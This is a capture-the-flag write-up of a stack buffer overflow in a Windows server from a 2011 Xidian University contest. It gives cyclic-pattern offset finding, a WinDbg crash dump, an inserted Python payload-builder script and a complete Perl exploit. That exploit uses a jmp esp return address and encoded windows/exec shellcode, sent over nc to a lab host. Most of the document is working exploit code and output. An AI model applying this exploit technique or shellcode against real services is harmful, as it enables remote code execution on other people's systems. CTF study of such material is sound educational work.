Running the server shows it listening on local port 7777.

Generate an oversized cyclic pattern (2000 bytes) and submit it with nc:

root@kali:~/Desktop#  /opt/metasploit/apps/pro/msf3/tools/pattern_create.rb 2000 > ~/Desktop/hi.txt
root@kali:~/Desktop# cat hi.txt |nc -vv 192.168.1.16 7777
192.168.1.16: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.16] 7777 (?) open

The server crashed, with EIP overwritten to 37674136:

Executable search path is:
ModLoad: 00400000 0040c000   C:\Documents and Settings\Administrator\桌面\xdcsc2011\xdcsc2011\shellcode溢出\第四题\exploit.exe
ModLoad: 7c920000 7c9b6000   C:\WINDOWS\system32\ntdll.dll
ModLoad: 7c800000 7c91d000   C:\WINDOWS\system32\kernel32.dll
ModLoad: 71a20000 71a37000   C:\WINDOWS\system32\WS2_32.dll
ModLoad: 77be0000 77c38000   C:\WINDOWS\system32\msvcrt.dll
ModLoad: 71a10000 71a18000   C:\WINDOWS\system32\WS2HELP.dll
ModLoad: 77da0000 77e49000   C:\WINDOWS\system32\ADVAPI32.dll
ModLoad: 77e50000 77ee2000   C:\WINDOWS\system32\RPCRT4.dll
ModLoad: 77fc0000 77fd1000   C:\WINDOWS\system32\Secur32.dll
ModLoad: 719c0000 719fe000   C:\WINDOWS\system32\mswsock.dll
ModLoad: 60fd0000 61025000   C:\WINDOWS\system32\hnetcfg.dll
ModLoad: 77ef0000 77f38000   C:\WINDOWS\system32\GDI32.dll
ModLoad: 77d10000 77d9f000   C:\WINDOWS\system32\USER32.dll
ModLoad: 76300000 7631d000   C:\WINDOWS\system32\IMM32.DLL
ModLoad: 62c20000 62c29000   C:\WINDOWS\system32\LPK.DLL
ModLoad: 73fa0000 7400b000   C:\WINDOWS\system32\USP10.dll
ModLoad: 71a00000 71a08000   C:\WINDOWS\System32\wshtcpip.dll
(f44.a68): Access violation - code c0000005 (!!! second chance !!!)
eax=00409a68 ebx=00000080 ecx=00410e20 edx=00000000 esi=00000200 edi=0012fdf4
eip=37674136 esp=0012fbbc ebp=00000064 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
37674136 ??              ???
0:000> d esp
0012fbbc  41 67 38 41 67 39 41 68-30 41 68 31 41 68 32 41  Ag8Ag9Ah0Ah1Ah2A
0012fbcc  68 33 41 68 34 41 68 35-41 68 36 41 68 37 41 68  h3Ah4Ah5Ah6Ah7Ah
0012fbdc  38 41 68 39 41 69 30 41-69 31 41 69 32 41 69 33  8Ah9Ai0Ai1Ai2Ai3
0012fbec  41 69 34 41 69 35 41 69-36 41 69 37 41 69 38 41  Ai4Ai5Ai6Ai7Ai8A
0012fbfc  69 39 41 6a 30 41 6a 31-41 6a 32 41 6a 33 41 6a  i9Aj0Aj1Aj2Aj3Aj
0012fc0c  34 41 6a 35 41 6a 36 41-6a 37 41 6a 38 41 6a 39  4Aj5Aj6Aj7Aj8Aj9
0012fc1c  41 6b 30 41 6b 31 41 6b-32 41 6b 33 41 6b 34 41  Ak0Ak1Ak2Ak3Ak4A
0012fc2c  6b 35 41 6b 36 41 6b 37-41 6b 38 41 6b 39 41 6c  k5Ak6Ak7Ak8Ak9Al
0:000>

Locate the overflow offset (EIP holds the pattern bytes "6Ag7" read little-endian; the dump at esp starts with "Ag8A"):

root@scan:~/Desktop# /opt/metasploit/apps/pro/msf3/tools/pattern_offset.rb 37674136
[*] Exact match at offset 200
root@scan:~/Desktop# /opt/metasploit/apps/pro/msf3/tools/pattern_offset.rb  Ag8A
[*] Exact match at offset 204
So the 4 bytes at offset 200 overwrite the saved return address. The esp register itself is not overwritten; after the function's ret pops our fake return address, esp simply points at offset 204 of the buffer, which is why the dump at esp begins with "Ag8A". That makes a jmp esp gadget the natural choice: whatever follows the 4-byte return address is executed directly.

200 bytes   4 bytes             shellcode (lands at esp, offset 204)
[junk]      [jmp esp address]   [shellcode here]
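The same offset search and payload layout as a self-contained script. This is an added example, not the post's code: it reimplements what pattern_create.rb / pattern_offset.rb did above, checks the crash values reported by the debugger, and builds the [junk][jmp esp][NOP sled][shellcode] buffer. The 223-byte shellcode is a constructed stand-in (int3 breakpoints) sized like the encoded windows/exec blob, and the bad-character set is an assumption about a line-oriented server that the post does not state.

```python
import string
import struct

# Added example, not the original post's code.

def pattern_create(length):
    """Metasploit-style cyclic pattern Aa0Aa1Aa2...Ab0...: every 4-byte window is
    unique within the first 20280 bytes, so a register value read from the crash
    maps to exactly one offset in the sent data."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)  # caller asked for more than the pattern can supply


def pattern_offset(value, length=2000):
    """value is either the 32-bit register value from the debugger (an int, which
    sits in memory little-endian, so 0x37674136 is the bytes '6Ag7') or a
    4-character chunk seen in a memory dump. Returns -1 when the value is not part
    of the pattern, i.e. that register was not overwritten by our data."""
    if isinstance(value, int):
        needle = struct.pack('<I', value)
    else:
        needle = value.encode() if isinstance(value, str) else bytes(value)
    return pattern_create(length).find(needle)


JMP_ESP = 0x7ffa4512  # jmp esp address used by the post's exploit


def build_payload(shellcode, ret_offset, jmp_esp=JMP_ESP, nops=7):
    """[junk][saved EIP -> jmp esp][NOP sled][shellcode]\\r\\n, the layout in the
    diagram above: the overwritten return address sits at ret_offset; after the
    function's ret, esp points at ret_offset + 4, where the sled starts."""
    junk = b'A' * ret_offset
    eip = struct.pack('<I', jmp_esp)  # little-endian, same as Perl's pack('V', ...)
    return junk + eip + b'\x90' * nops + shellcode + b'\r\n'


def bad_chars(data, bad=b'\x00\r\n'):
    """Byte values from `bad` that occur in data. Assumption (not stated by the
    post): the server reads one line and handles it with C string routines, so
    NUL, CR and LF would truncate or split the input. Adjust for the real protocol."""
    return sorted(set(b for b in data if b in bad))


if __name__ == '__main__':
    ret_offset = pattern_offset(0x37674136)  # EIP value from the crash -> 200
    esp_offset = pattern_offset('Ag8A')      # first bytes dumped at esp -> 204
    print('return address at offset', ret_offset, ', esp lands at offset', esp_offset)
    # Constructed stand-in for the 223-byte encoded windows/exec blob: int3 so a
    # debugger stops right after the sled instead of popping calc.
    stub_shellcode = b'\xcc' * 223
    payload = build_payload(stub_shellcode, ret_offset)
    print(len(payload), 'bytes, bad chars:', bad_chars(payload[:-2]))  # 436, []
```

With a real 223-byte shellcode the buffer is 200 + 4 + 7 + 223 + 2 = 436 bytes, the figure nc reports as "sent 436" further down; checking the body for the assumed bad characters before sending is what tells you whether an encoder like shikata_ga_nai was needed at all.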

#!/usr/bin/perl
# 2011 Xidian University Network Attack and Defense Contest, overflow challenge 4, exploit
# by c4rp3nt3r@0x50sec.org
#
use strict;
use warnings;

my $junk = "A" x 200;               # offsets 0..199: filler up to the saved return address
my $eip  = pack('V', 0x7ffa4512);   # offsets 200..203: jmp esp, little-endian
# windows/exec - 196 bytes
# http://www.metasploit.com
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc
# (196 bytes is the raw payload size; the blob below is 223 bytes because it
#  carries a 27-byte shikata_ga_nai decoder stub: mov cl,0x32 = 50 dwords decoded)
my $payload =
"\x90\x90\x90\x90\x90\x90\x90" .    # short NOP sled, lands at esp (offset 204)
"\xd9\xc0\xbb\xcd\xf7\x9a\xa7\xd9\x74\x24\xf4\x5d\x31\xc9" .
"\xb1\x32\x31\x5d\x17\x03\x5d\x17\x83\x08\xf3\x78\x52\x6e" .
"\x14\xf5\x9d\x8e\xe5\x66\x17\x6b\xd4\xb4\x43\xf8\x45\x09" .
"\x07\xac\x65\xe2\x45\x44\xfd\x86\x41\x6b\xb6\x2d\xb4\x42" .
"\x47\x80\x78\x08\x8b\x82\x04\x52\xd8\x64\x34\x9d\x2d\x64" .
"\x71\xc3\xde\x34\x2a\x88\x4d\xa9\x5f\xcc\x4d\xc8\x8f\x5b" .
"\xed\xb2\xaa\x9b\x9a\x08\xb4\xcb\x33\x06\xfe\xf3\x38\x40" .
"\xdf\x02\xec\x92\x23\x4d\x99\x61\xd7\x4c\x4b\xb8\x18\x7f" .
"\xb3\x17\x27\xb0\x3e\x69\x6f\x76\xa1\x1c\x9b\x85\x5c\x27" .
"\x58\xf4\xba\xa2\x7d\x5e\x48\x14\xa6\x5f\x9d\xc3\x2d\x53" .
"\x6a\x87\x6a\x77\x6d\x44\x01\x83\xe6\x6b\xc6\x02\xbc\x4f" .
"\xc2\x4f\x66\xf1\x53\x35\xc9\x0e\x83\x91\xb6\xaa\xcf\x33" .
"\xa2\xcd\x8d\x59\x35\x5f\xa8\x24\x35\x5f\xb3\x06\x5e\x6e" .
"\x38\xc9\x19\x6f\xeb\xae\xd6\x25\xb6\x86\x7e\xe0\x22\x9b" .
"\xe2\x13\x99\xdf\x1a\x90\x28\x9f\xd8\x88\x58\x9a\xa5\x0e" .
"\xb0\xd6\xb6\xfa\xb6\x45\xb6\x2e\xd5\x08\x24\xb2\x1a";
# 200 + 4 + 7 + 223 + 2 = 436 bytes, the count nc reports below
print $junk.$eip.$payload."\r\n";

This challenge is way too easy~~~


After sending the exploit, the familiar calc popped up:

root@scan:~/Desktop# perl exp.pl |nc -vv 192.168.1.16 7777
192.168.1.16: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.1.16] 7777 (?) open
sent 436, rcvd 0

2011 Xidian Network Attack and Defense Contest, shellcode overflow challenge 4: debugging notes


Original article: http://bluereader.org/article/23968077